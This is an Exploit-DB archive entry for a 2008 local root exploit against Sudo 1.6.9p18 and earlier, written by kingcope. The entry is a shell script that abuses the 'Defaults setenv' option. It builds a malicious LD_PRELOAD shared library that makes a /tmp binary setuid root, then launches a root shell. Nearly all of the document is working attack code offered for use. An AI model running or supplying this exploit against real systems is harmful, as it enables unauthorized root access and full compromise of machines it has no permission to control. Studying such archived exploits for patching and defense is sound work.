Sudo 1.6.9p18 - 'Defaults SetEnv' Local Privilege Escalation

EDB-ID:

7129

CVE:

N/A


Author:

kingcope

Type:

local


Platform:

Multiple

Date:

2008-11-15


#!/bin/sh
#* Sudo <= 1.6.9p18 local r00t exploit
#* by Kingcope/2008/www.com-winner.com
#
# Most lame exploit EVER!
#
# Needs a special configuration in the sudoers file:
# --->>>>> "Defaults setenv" so environ vars are preserved :) <<<<<---
#
# May also need the current users password to be typed in
# So this exploit is UBERLAME!
# First Argument to this shell file: A program your current
# user is allowed to execute via sudo. sudo has to be in 
# the path!!
# successfully tested on FreeBSD-7.0 and RedHat Linux
# I don't even know why I realease such stuffz
# I'M GONNA GRAB A COFFE NOW;HAVE PHUN !!!

echo "Sudo <= 1.6.9p18 local r00t exploit"
echo "by Kingcope/2008/www.com-winner.com"

if [$1 == ""]; then
echo "Please give me a program to run via sudo."
echo "Allowed programs:"
sudo -l
exit
fi

cat > program.c << _EOF
#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init()
{
 if (!geteuid()) {
 unsetenv("LD_PRELOAD");
 setgid(0);
 setuid(0);
 execl("/bin/sh","sh","-c","chown 0:0 /tmp/xxxx; /bin/chmod +xs /tmp/xxxx",NULL);
 }
}

_EOF

cat > xxxx.c << _EOF
int main(void) {
       setgid(0); setuid(0);
//       unlink("/tmp/xxxx");
       execl("/bin/sh","sh",0); }
_EOF

gcc -o /tmp/xxxx xxxx.c
gcc -o program.o -c program.c -fPIC
gcc -shared -Wl,-soname,libno_ex.so.1 -o /tmp/libno_ex.so.1.0 program.o -nostartfiles
sudo LD_PRELOAD=/tmp/libno_ex.so.1.0 $1
if [ -f /tmp/xxxx ]; then
echo "CONGRATULATIONS, IT'S A ROOTSHELL!"
/tmp/xxxx
else
echo "Sorry, exploit failed. No envvars allowed?"
fi

# milw0rm.com [2008-11-15]